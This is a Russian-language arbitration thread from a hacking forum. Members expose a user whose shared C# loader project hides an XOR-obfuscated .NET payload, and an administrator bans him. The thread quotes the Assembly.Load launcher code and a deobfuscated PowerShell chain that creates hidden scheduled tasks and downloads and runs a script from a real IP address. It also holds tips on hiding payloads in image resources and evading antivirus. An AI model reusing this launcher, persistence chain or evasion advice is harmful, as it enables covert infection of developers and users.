Арбитраж UserDevFox Расспространение малвари

[unbalance]

1) UserDevFox
2) http://xss.pro/members/186140/
3) Тема http://xss.pro/threads/55528/

Да как бы в правилах форума я не видел пункта что я должен кому-то что-то объяснять и тем более оправдываться
Виртуалка в помощь собери,узнай,напиши

В файле rdata.cs шеллкод который обусфицирован xor

В файле Form1.cs запуск этого шеллкода

Какое-то странное обвинение, исходники у тебя в руках. Если и хочешь что-то написать, проанализируй и только потом пиши конструктивно, так получается пальцем в небо для набивки репы

Если у меня было бы желание разбираться в этом шеллкоде я бы так и написал. Но на банальный вопрос о том, что выполняет данный шеллкод ты постеснялся ответить. Да и большинство юзеров прошло бы мимо и незаметило его. Возможно это как раз тот случай когда внутри проекта ты запускаешь какое нибудь безобидное приложение что бы обмануть антивирус или что то в этом роде - те шеллкод во благо, в чем конечно я сомневаюсь, ведь уже на это стоит вешать детекты. Возможно это предкомпилированный лоадер который нам доступен в исходниках, но в шеллкод не передается никаких параметров, и я сомневаюсь что там вписана какая то панель. Вообщем уже слишком мутно, и ты отказываешься отвечать на вопросы. Добро пожаловать в Арбитраж

 

[unbalance]

Единственный комментарий к этому шеллкоду на втором скрине - //Важно

 

[DildoFagins]

Но на банальный вопрос о том, что выполняет данный шеллкод ты постеснялся ответить.

Он запускается через Assembly.Load, так что это не шеллкод, это дотнетовский экзешник в чистом виже. Расксорь и открой в dnSpy, если там нет какой-то хитрой обфускации, то все должно быть понятно сразу. Если есть, то это точно палево какое-то. Но в любом случае, если кто-то выкладывает сорсы с такой стремотой, надо сразу банить от греха подальше.

 

[unbalance]

Он запускается через Assembly.Load, так что это не шеллкод, это дотнетовский экзешник в чистом виже. Расксорь и открой в dnSpy, если там нет какой-то хитрой обфускации, то все должно быть понятно сразу. Если есть, то это точно палево какое-то. Но в любом случае, если кто-то выкладывает сорсы с такой стремотой, надо сразу банить от греха подальше.

В данный момент не могу в виду того что нахожусь в автобусе, но юзеры из темы отписали уже что уже что то не хорошее (обуфусц.)

А быстрый пробег по дизассемблеру, скажем так, показал весьма жирные ветвления, хех.

 

[UserDevFox]

Ну давай глянем что же может выполнять этот "Шелл"
В теме я скинул src двух версий одна версия обычная вторая версия protected.
И если ты откроешь Form1.cs в папке CryptoStat и файл в Form1.cs в папке protected увидишь что это одно и то же, в rdata протект функций для обхода WinDefender.
Если тебя так насторожил файл rdata собирай решение из папки CryptoStat

 

[unbalance]

Если тебя так насторожил файл rdata собирай решение из папки CryptoStat

Получается у тебя уже готовая полезная нагрузка лежит в качестве примера в проекте protected.
Но зачем ты не отвечал изначально в теме на мои вопросы, умничал таким образом?

Зачем было говорить мне - "скомпилируй = узнаешь"? Я задал тебе вопрос о том что выполняет шеллкод - несколько раз и не получил ответа ни разу в твоей теме. Было сложным объяснить сразу?

Как люди скачавшие твои исходники поймут что им копировать и куда?

Если ты правда думаешь что я тебе как то повредить хочу - так нет, я обратил внимание на шеллкод который будет выполнен в любом случае когда человек скачавший проект нажмет кнопку отладки в студии, который при этом недокументирован, и самое смешное - что ты всего лишь подтвержал раз за разом мои опасения.

А если юзеры скачавшие проект и скомпилировавшие его - запусят в качестве тестов, то выполнится твой шеллкод, правильно? Откуда им знать что это за массив байт и для чего они нужны? Или запустят в отладчике студии, правильно?

Ты вроде бы и оправдался, но как бы все равно - полезную нагрузку засунул и не объяснил к чему она там. Злой умысел или нет, решать совсем не мне.

В любом случае ты для меня хороший кодер, хорошая реализация, сишарп я не знаю, но расспространение тоже неплохое, просто прятать думаю нужно будет в какой нибудь картинке в ресурсах, спасибо! Мне очень понравилась твоя тема и натолкнула на пару идей. Мне лично данная тема была полезной.

 

[UserDevFox]

Получается у тебя уже готовая полезная нагрузка лежит в качестве примера в проекте protected.
Но зачем ты не отвечал изначально в теме на мои вопросы, умничал таким образом?

Зачем было говорить мне - "скомпилируй = узнаешь"? Я задал тебе вопрос о том что выполняет шеллкод - несколько раз и не получил ответа ни разу в твоей теме. Было сложным объяснить сразу?

Как люди скачавшие твои исходники поймут что им копировать и куда?

Если ты правда думаешь что я тебе как то повредить хочу - так нет, я обратил внимание на шеллкод который будет выполнен в любом случае когда человек скачавший проект нажмет кнопку отладки в студии, который при этом недокументирован, и самое смешное - что ты всего лишь подтвержал раз за разом мои опасения.

А если юзеры скачавшие проект и скомпилировавшие его - запусят в качестве тестов, то выполнится твой шеллкод, правильно? Откуда им знать что это за массив байт и для чего они нужны? Или запустят в отладчике студии, правильно?

Ты вроде бы и оправдался, но как бы все равно - полезную нагрузку засунул и не объяснил к чему она там. Злой умысел или нет, решать совсем не мне.

В любом случае ты для меня хороший кодер, хорошая реализация, сишарп я не знаю, но расспространение тоже неплохое, просто прятать думаю нужно будет в какой нибудь картинке в ресурсах, спасибо! Мне очень понравилась твоя тема и натолкнула на пару идей. Мне лично данная тема была полезной.

Писал лодырь и использовал в личных целях, поэтому в сурсы и зашла папка protected никому в теме не писал что используйте эти сорцы. В архиве я скинул чистые сорцы без какого либо протекта и везде есть комментарии что куда и зачем, любой кто интересуется этим либо пишет приватный лодырь либо покупает готовые решения, мой лодырь только в качестве ознакомления

 

[unbalance]

В архиве я скинул чистые сорцы без какого либо протекта и везде есть комментарии что куда и зачем

Везде есть комментарии кроме второго проекта - там только один комментарий - напротив выполнения шеллкода.

 private void load_program()
        {
            rdata rd = new rdata();
            Assembly.Load(rd.GetData()).EntryPoint.Invoke(null, null);
        }

        private void Form1_Load(object sender, EventArgs e)
        {
            Thread t = new Thread(new ThreadStart(load_program)); // Важно запускать в новом потоке, потому что проблемно запустить 2 приложения винформ в 1 потоке
            t.IsBackground = true;
            t.Start();
        }

Во втором проекте который выполняет полезную нагрузку - не было никаких объяснений. Шеллкод просто выполнится при отладке если какой нибудь дурачек его запустит. Ты это понимаешь? Я это понимаю. И многие тоже понимают. Кроме дурачка который тыкнет в студии на одну кнопочку и выпонится как раз твой шеллкод. Я еще раз говорю - всё мне понравилось в реализации, кроме конечно того как ты прячешь шеллкод. Я бы прятал в ресурсах - обусфицированным очень хорошо и внедренным в картинку.

Не знаю умышленно ты это делал, или просто затупил - мне лично все равно. Но реально натолкивает на живую мысль о злономеренности, хоть мне всё и нравится очень. Но лучше бы ты тогда ответил и объяснил всё с самого начала и не пришлось бы писать арбитраж. А так все указывает на расспространение малвари. Так что надеюсь что тебя НЕ забанят, и ты изменишь тему что бы убрать шеллкод из нее. Потому, что юзерам нужно все объяснять и они будут бездумно тыкать на все кнопочки. А у тебя второй проект уже заряженный лежит, прям для того что бы они кликнули на "отладку", лол

Время шуток уровня /b
Если это выглядит как сперма, пахнет как сперма, я не буду проверять языком - сперма это или нет

 

[petroglyph]

Он запускается через Assembly.Load, так что это не шеллкод, это дотнетовский экзешник в чистом виже. Расксорь и открой в dnSpy, если там нет какой-то хитрой обфускации, то все должно быть понятно сразу. Если есть, то это точно палево какое-то. Но в любом случае, если кто-то выкладывает сорсы с такой стремотой, надо сразу банить от греха подальше.

Там приложение распаковывается в Cryptostats.exe который как я понял и есть этот софт,но уже заранее скомпиленный автором
Мб подразумеватся то что тот кто захочет склеить это пойдет в проект студии и укажет вместо этого шеллкода свой
Есть ли что-то внутри этого бинарника мне искать уже лень,если у кого-то особенно горит можете посидеть и потыкать
https://www.sendspace.com/file/jme28c
pass xss.pro

 

[unbalance]

но уже заранее скомпиленный автором
Мб подразумеватся то что тот кто захочет склеить это пойдет в проект студии и укажет вместо этого шеллкода свой

автор это объяснил в арбитраже - а объяснять в теме отказывался, жаль что дело дошло до этого

 

[admin]

Очень странный код. UserDevFox, объясните происходящее, пожалуйста.

 

[corax]

Я вам расксорил, но под линем нечем декомпилить. Так что если кто-то хочет, пожалуйста.

 

[UserDevFox]

Очень странный код. UserDevFox, объясните происходящее, пожалуйста.

В исходах две папки
CryptoStat - Исходных код чистый без всяких попыток обхода АВ
Protected - Билд с попыткой обхода АВ ( Как написал выше это лишь пример как можно это сделать, собирать проект нужно исключительно из папки CryptoStat )

 

[Bertor]

Я вам расксорил, но под линем нечем декомпилить. Так что если кто-то хочет, пожалуйста.

Бинарь стучит сюда https://cryptostat.online/file.txt
Этот ответ подаётся выполняется через cmd.exe /C ...
Есть персистентность через реестр авторан и временное отключение пока запущенны некоторые снифферы в процессах.
Все очень примитивно.

 

[DildoFagins]

После небольшой деобфускации руками имеем:

powershell.exe -c PowerShell -Exec Bypass -nop -w hidden ('schtasks /delete /tn '\Windows\Update\WindowsParentauptate' /F;schtasks /create /sc minute /mo 1 /tn  '\Windows\Update\WindowsParentauptate' /tr 'powershell -w hidden -e  0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACcAJwAnAFwAMQAxADEAMQAxADEAMQAuAGIAYQB0ACcAJwAnAA=' /RL HIGHEST;schtasks /delete /tn '\Windows\Update\Parentauptatetime'/F;schtasks /create /sc ONLOGON /DELAY 0010:00 /tn '\Windows\Update\Parentauptatetime' /IT /tr 'powershell -w hidden -e  aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA0ADYALgA1ADkALgAxADAALgAxADMAOAAvAHMAYwByAGkAcAB0ACcAKQA=' /RL HIGHEST')|& ( $sHElLId[1]+$SHELlId[13]+'X')

iex (New-Object Net.WebClient).DownloadString('http://146.59.10.138/script')

 

[CashFlow]

в расход этого лейтенанта

 

[c0d3r_0f_shr0d13ng3r]

Если у меня было бы желание разбираться в этом шеллкоде я бы так и написал

давай я посмотрю)) Это не просто шеллкод, а .NET-ная ассембля.Ее декомпильнуть надо и изучить.
UPD: Ля, уже опередили

 

[unbalance]

Ну думаю это всё. Земля тебе стекловатой.

 

[admin]

Увы, все ясно.
UserDevFox - аккаунт забанен. Жаль, что вы выложили не чистый код.